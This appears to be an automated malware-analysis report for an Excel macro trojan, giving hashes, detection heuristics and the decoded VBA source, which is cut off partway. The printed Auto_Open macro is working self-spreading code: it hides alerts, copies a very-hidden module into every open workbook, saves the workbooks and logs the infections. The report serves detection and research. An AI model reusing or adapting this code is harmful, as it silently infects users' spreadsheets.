Xls.Trojan.Taign-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 e9530b534517a351…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 1996-10-14 23:33:28
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 3b4bb30fbbe01f7689a94566939c3a9e
SHA-1: c77699d149ba877d733a3d927c05b387c8c58330
SHA-256: e9530b534517a3513e65efa32abb4e0f5b407e4d953012bf7b5c2c171b814229
Risk Score: 220

Malware Insights

Xls.Trojan.Taign-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Taign-1. It contains Auto_Open and Auto_Close VBA macros, indicating it attempts to execute code upon opening and closing. The macros create directories C:\MSOFFICE and C:\MSOFFICE\EXCEL, suggesting preparation for downloading and executing a second-stage payload.

Heuristics 4

  • ClamAV: Xls.Trojan.Taign-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Taign-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, rule: OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29968 bytes
SHA-256: 5b4ad008ce4bb60f559b3422465c18d75c92fc30539fe2f5e6224bd9847bb829

Detection
ClamAV: Xls.Trojan.Taign-1
Obfuscation or payload: unlikely

Preview script
First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Public closed
Sub Auto_Open()
Application.ScreenUpdating = False
Application.DisplayAlerts = False
On Error GoTo Err
If Dir("C:\MSOFFICE", vbDirectory) = "" Then MkDir "C:\MSOFFICE"
If Dir("C:\MSOFFICE\EXCEL", vbDirectory) = "" Then MkDir "C:\MSOFFICE\EXCEL"
If Dir("C:\MSOFFICE\EXCEL\XLSTART", vbDirectory) = "" Then MkDir "C:\MSOFFICE\EXCEL\XLSTART"
If Dir("C:\MSOFFICE\EXCEL\XLSTART\ALT", vbDirectory) = "" Then MkDir "C:\MSOFFICE\EXCEL\XLSTART\ALT"
Application.AltStartupPath = "C:\MSOFFICE\EXCEL\XLSTART\ALT\"
Application.OnSheetActivate = ""
Application.OnWindow = ""
If TypeName(Application.Caller) = "String" Then
For c = 1 To Len(Application.Caller)
If Mid(Application.Caller, c, 1) = "[" Then start = c + 1
If Mid(Application.Caller, c, 1) = "]" Then Length = c - start
Next c
If start = 0 Then
Source = Application.Caller
Else
Source = Mid(Application.Caller, start, Length)
End If
issrcVisible = Workbooks(Source).Windows(1).Visible
activewb = ActiveWorkbook.Name
selectsh = ActiveSheet.Name
PersExist = 0
For wb = 1 To Application.Workbooks.Count
If (Workbooks(wb).Name = "PERSONAL.XLS") Then PersExist = wb
exist = 0
For sh = 1 To Workbooks(wb).Modules.Count
If Workbooks(wb).Modules(sh).Name = " " Then
exist = 1
If Workbooks(wb).Modules(sh).Visible = True And Workbooks(wb).Windows(1).Visible = True And Workbooks(wb).ProtectWindows = False Then Workbooks(wb).Modules(sh).Visible = False
End If
Next sh
If exist = 0 And Workbooks(wb).ProtectWindows = False And Workbooks(wb).ReadOnly = False Then
Workbooks(Source).Windows(1).Visible = True
Workbooks(Source).Modules(" ").Visible = True
iswbSaved = Workbooks(wb).Saved
iswbVisible = Workbooks(wb).Windows(1).Visible
Workbooks(wb).Windows(1).Visible = True
If Workbooks(wb).Modules.Count >= 1 Then
Workbooks(Source).Modules(" ").Copy before:=Workbooks(wb).Modules(1)
ElseIf Workbooks(wb).DialogSheets.Count >= 1 Then
Workbooks(Source).Modules(" ").Copy before:=Workbooks(wb).DialogSheets(1)
Else
Workbooks(Source).Modules(" ").Copy before:=Workbooks(wb).Worksheets(1)
End If
Workbooks(wb).Modules(" ").Visible = xlVeryHidden
Workbooks(wb).Windows(1).Visible = iswbVisible
Workbooks(Source).Modules(" ").Visible = False
Workbooks(Source).Windows(1).Visible = issrcVisible
If iswbSaved = True Then Workbooks(wb).Save
End If
Open "c:\windows\system\info.doc" For Append As #1
Print #1, Time$ & "," & Date$ & "," & Workbooks(Source).Path & "\" & Workbooks(Source).Name & "," & Workbooks(wb).Path & "\" & Workbooks(wb).Name
Close
Next wb
If PersExist <>
... (truncated)